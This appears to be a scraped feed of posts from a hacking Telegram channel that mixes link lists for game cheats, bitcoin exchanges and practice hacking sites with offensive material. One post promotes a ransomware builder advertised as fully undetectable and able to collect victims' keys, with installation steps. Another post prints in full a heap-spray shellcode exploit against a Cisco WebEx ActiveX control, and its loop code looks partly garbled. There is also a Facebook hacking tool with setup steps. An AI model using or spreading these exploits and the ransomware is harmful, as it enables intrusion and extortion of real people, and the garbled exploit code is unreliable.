Forwarded from UNDERCODE NEWS
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑GAME HACKING APPS FOR ANDROID :
https://xmodgames.download
https://hackerbot.net/software/444-hackerbot-download
https://sbgamehacker.download/apk/
https://creehack.net
https://gameguardian.net/download
https://gamecihworld.puzl.com
https://www.luckypatchers.com/lucky-patcher-6-0-7-apk/
http://leoplaycard.info
https://gamekiller.co
https://latestmodapks.com/download-freedom-apk-latest/
https://play.google.com/store/apps/details?id=com.acr.rootfilemanager&hl=en_IN
USE FOR OFFLINE GAMES (LEGAL) :)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Techylist
Xmodgames - Download Xmod Apk For Android (Official)
People have been playing games like Clash of Clans, Minecraft, Clash Royale, Asphalt 8, Mortal Combat, etc. for such a long time that, most of them become dull. This is probably because the game is small or it is very hard after a certain level. So in such…
Forwarded from UNDERCODE NEWS
After fining Google 9.7 billion US dollars, the EU exaggerated Google: shopping search is not bad
#International
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑all trusted websites 2020 for buying bitcoin :
https://bitcoin.org/en/buy
www.luno.com
www.coinbase.com
www.shakepay.com
www.altcointrader.co.za
Localbitcoin.com
www.belfrics.io
www.bitpesa.com
www.remitano.com
www.spectrocoin.com
www.flux.com
www.altcointrader.co.za
www.coinmama.com
www.cex.io
www.coinmama.com
www.altcointrader.co.za
www.golix.com
www.spectrocoin.com
www.luno.com
www.worldwidebitcoin.com
www.localbitcoins.com
https://bit2me.com/
www.blockchain.com
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
bitcoin.org
Buy Bitcoin
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑SOME FREE SMS APPLICATIONS :
http://www.chompsms.com/
https://play.google.com/store/apps/details?id=com.jb.gosms
http://www.handcent.com/
https://mightytext.net/
http://www.mysms.com/
https://play.google.com/store/apps/details?id=com.moez.QKSMS
http://www.textra.me/
textnow.com & textplus & nextplus... by watching videos.
verified from 1 month
@undercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Chompsms
Chomp SMS - The antidote to boring texting...
An ultra-customizable alternative to your stock Android SMS / MMS app
Forwarded from UNDERCODE NEWS
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
#Web Hacking new
[Hack This Site!](https://www.hackthissite.org/) - a free, safe and legal training ground for hackers to test and expand their hacking skills
[Hack The Box](https://www.hackthebox.eu) - a free site to perform pentesting in a variety of different systems.
[Webhacking.kr](http://webhacking.kr/)
[0xf.at](https://0xf.at/) - a website without logins or ads where you can solve password-riddles (so called hackits).
[Gruyere](https://google-gruyere.appspot.com/)
[Others](https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps)
https://github.com/Manisso/fsociety
https://github.com/sundowndev/hacker-roadmap
https://github.com/infoslack/awesome-web-hacking
https://github.com/LyleMi/Learn-Web-Hacking
https://github.com/nil0x42/phpsploit
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
www.hackthissite.org
HackThisSite.org is a free, safe and legal training ground for hackers to test and expand their ethical hacking skills with challenges, CTFs, and more.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑RANSOMWARES Sources:
Excellent CryptoWall 3.0 Writeup: http://blog.brillantit.com/?p=15
CryptoWall 3.0 Writeup: http://www.sentinelone.com/blog/anatomy-of-cryptowall-3-0-a-look-inside-ransomwares-tactics/
Chimera Ransomware: https://threatpost.com/chimera-ransomware-promises-to-publish-encrypted-data-online/115293/
CryptoWall message text used came from https://www.pcrisk.com/removal-guides/7844-cryptowall-virus
CryptoWall 4.0: http://securityaffairs.co/wordpress/41718/cyber-crime/cryptowall-4-0-released.html
CryptoWall 4.0 DECRYPT.html: http://www.bleepstatic.com/images/news/ransomware/cryptowall/v4/note-part-1.jpg
Talos CryptoWall 4.0 Report: http://blog.talosintel.com/2015/12/cryptowall-4.html
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
SentinelOne
Anatomy of CryptoWall 3.0 – a look inside ransomware's tactics
CryptoWall is a new and highly destructive variant of ransomware. Ransomware is malicious software (malware) that infects your computer and holds hostage something of value to you in exchange for money.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Automate your work : Evil operator for evaluating code, translating text,
taking notes, searching via Google, etc.
INSTALLATION & RUN :
1) git clone https://github.com/Dewdrops/evil-extra-operator.git
2) cd evil-extra-operator
3) In your Emacs init file:
;; change default key bindings (if you want) HERE
;; (setq evil-extra-operator-eval-key (kbd "ge"))
(require 'evil-extra-operator)
(global-evil-extra-operator-mode 1)
4) The key binding customization must be placed BEFORE (require 'evil-extra-operator).
5) Or you can just choose the commands you need and bind them yourself:
(require 'evil-extra-operator)
(define-key evil-motion-state-map "gr" 'evil-operator-eval)
(define-key evil-motion-state-map "g'" 'evil-operator-google-translate)
Commands and default bindings
1) gr (evil-operator-eval)
Operator for evaluating code, i.e., use grip to evaluate the current paragraph, grr to evaluate the current line, or, if you are in visual state, gr to evaluate the active region. You can customize the option evil-extra-operator-eval-modes-alist to let evil-operator-eval support more languages. Example:
(setq evil-extra-operator-eval-modes-alist
      '((ruby-mode ruby-send-region)
        (enh-ruby-mode ruby-send-region)))
2) gG (evil-operator-google-search)
Operator to search the web via Google.
3) g. (evil-operator-google-translate)
Operator to translate text via Google Translate. To use this command, you should have google-translate installed.
4) gh (evil-operator-highlight)
Operator to highlight a region. To use this command, you should have highlight.el installed. You can use hlt-eraser-mouse or hlt-eraser, which are provided by highlight.el, to erase the highlighted area.
5) gs (evil-operator-fold)
Operator to fold a region. To use this command, you should have fold-this.el installed. You can use fold-this-unfold-at-point or fold-this-unfold-all, which are provided by fold-this.el, for unfolding.
6) go (evil-operator-org-capture)
Operator form of org-capture, so you can use goip to capture the current paragraph.
7) gR (evil-operator-remember)
Like evil-operator-org-capture, but uses remember-region instead of org-capture.
8) No default binding (evil-operator-query-replace)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
Dewdrops/evil-extra-operator
Evil operator for evaluating codes, translating text, taking notes, searching via google, etc. - Dewdrops/evil-extra-operator
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑FACEBOOK PENTESTING :
The New version OFFICIAL FBHT V3
INSTALLATION & RUN :
1) download or clone
https://github.com/chinoogawa/fbht/archive/V3.0.zip
https://github.com/chinoogawa/fbht/archive/V3.0.tar.gz
2) Run the setup script from the fbht directory:
fbht$:- python setup.py
Run without a command, it prints the usage message:
/usr/lib/python2.7/distutils/dist.py:267
usage: setup.py [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]
or: setup.py --help [cmd1 cmd2 ...]
or: setup.py --help-commands
or: setup.py cmd --help
R E Q U I R E M E N T S :
Selenium
Matplotlib-1.2.1
Networkx-1.8.1
Numpy-1.7.1
Pygraphviz-1.1
Simplejson-3.3.0
Mechanize-0.2.5
Other: gephi-0.8.2-beta (Graphs software)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑NUCLEAR RANSOMWARE :)new update/more features
F E A T U R E S :
Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extension instead of encrypting the files)
Multiple encryption methods
Select file extensions to target
Decide if payload should self-destruct (Console mode feature only)
Decide which drive to target for encryption (working directory)
Verified server access through port forwarding VPN
INSTALLATION & RUN :
1) git clone https://github.com/leonv024/RAASNet.git
2) pip3 install -r requirements.txt
3) python3 RAASNet.py
On Linux, you might need to install these packages:
4) sudo apt install python3-tk python3-pil python3-pil.imagetk
5) Testing connection with remote server:
6) Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
7) python3 test_socket.py
8)video https://github.com/leonv024/RAASNet/blob/master/demo/PyCrypto-vs-PyAES_demo_10fps.gif
U S E F O R L E A R N
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Guide on Metasploitable 2.pdf
2.4 MB
Exploiting Port 22 SSH
Bruteforce Port 22 SSH (RSA Method)
Exploiting port 23 TELNET (Credential Capture)
Exploiting TELNET (Bruteforce)
Port 25 SMTP User Enumeration
Exploiting Port 80 (PHP)
Exploiting Port 139 & 445 (Samba)
Exploiting Port 8080 (Java)
Exploiting Port 5432 (Postgres)
Exploiting Port 6667 (UnrealIRCD)
Exploiting Port 36255
Remote Login Exploitation
Remote Shell Exploitation
Exploiting Port 8787
Bindshell
Exploiting Port 5900 (VNC)
Access Port 2121 (ProFTPD)
Exploiting Port 8180 (Apache Tomcat)
Privilege Escalation via NFS
Exploiting Port 3306 (MYSQL)
Network Scan
Exploiting Port 21 FTP (Hydra)
Exploiting VSFTPD 2.3.4
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit :
<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑BOTNET FOR BEGINNERS :
A) What is a botnet?
A trash can with fill sensors, a video surveillance system with a recording function, a smart TV box: all of these devices use IoT technologies. All of them are connected to the network, so data transfer is carried out without human intervention.
> A botnet is a chain of many devices connected to the Internet. Hackers infect each device with malware, which allows them to maintain complete control over it.
> Cybercriminals use botnets to target Internet sites. Using a botnet, cybercriminals can steal people's data or gain unauthorized access. The most common use of botnets is for DDoS attacks.
B) Cyber attacks: how to launch them via botnets?
The launch scheme is similar to a regular DDoS attack. However, hackers do not infect users' computers, but their IoT devices. Most modern devices have at least some vulnerabilities, for example, when the owners do not change the default password. Cybercriminals simply connect to poorly secured devices and create a botnet. Thus, the owners of botnets have access to several thousand devices simultaneously, which enables them to conduct cyber attacks.
C) The most famous attacks through botnets
Many cyberattacks have made history, and several of them were carried out through botnets. The first of the largest botnets was Mirai. Cybersecurity experts discovered it in September 2016. The initial cause of infection was the default passwords set by manufacturers on the devices they produced. Brian Krebs' website was the first victim of the attack. Brian Krebs is a journalist who had previously written about botnets. The cybercriminals then chose the American DNS operator Dyn as the next target. The world's largest websites stopped working as a result (you can read more about this in this article). Hackers also used Mirai to attack the European host OVH. It is estimated that the original botnet infected nearly half a million IoT devices.
D) Another botnet was Reaper, also known as IoTroop. It was first used for attacks in the fall of 2017. Devices were hacked very quickly, even faster than it was with Mirai. Not only poorly protected devices with default passwords are infected, but also devices from well-known manufacturers (for example, D-Link). Subsequently, the botnet was used by cybercriminals who directed the attack on large European banks.
E) How many devices do you need for a DDoS attack?
For a successful cyber attack, tens of thousands of devices must be connected. The specific number of bots will vary depending on the cybercriminals' ability to infect unprotected devices.
Akamai gives interesting statistics. So, in 2016, several customers of the company suffered from a cyber attack from 13 thousand devices. It was enough to send almost 270 thousand requests per hour. In a DDoS attack in 2017, hackers attacked one of Akamai's customers via a network of more than 75,000 bots.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁